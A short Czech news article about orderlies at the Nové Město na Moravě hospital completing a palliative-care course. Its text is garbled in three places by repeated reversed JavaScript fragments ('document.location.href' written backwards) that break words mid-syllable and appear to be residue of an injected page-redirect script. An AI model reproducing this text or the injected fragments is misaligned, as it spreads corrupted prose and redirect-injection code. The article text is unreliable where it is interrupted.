Rainbow page separator

Nemocnice cílí na paliativní péči, sanitáři prošli kurzem

Úterý, 16. dubna 2019

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Kurz o základních principech paliativní péče absolvovali sanitáři novoměstské nemocnice. Akce se zúčastnilo celkem šestnáct sanitářek, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to z oddělení dlouhodobě nemocných, následné intenzivní péče a chirurgického a interního oddělení.
„Kurz se skládal z teoretické části, doplněné o kazuistiky z praxe a osobní příběhy doprovázení umírajících, a samozřejmě nechyběl ani praktický nácvik péče o pacienta na lůžku,“ přiblížila vrchní sestra oddělení dlouhodobě nemocných novoměstské nemocnice Kateřina Havlová.
Sanitářky se rovněž seznámily s dalšími potřebnými vědomostmi a dovednostmi, které jsou při péči o nevyléčitelně nemocné pacienty nezbytné. „Účastníci kurzu si mohli vyzkoušet prvky bazálně stimulační péče i úskalí a specifika paliativní péče při hygieně a hydrataci pacienta. Hovořili jsme také o [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tom, jak souvisí péče o tělesné potřeby pacienta s jeho psychickým stavem,“ doplnila Kateřina Havlová.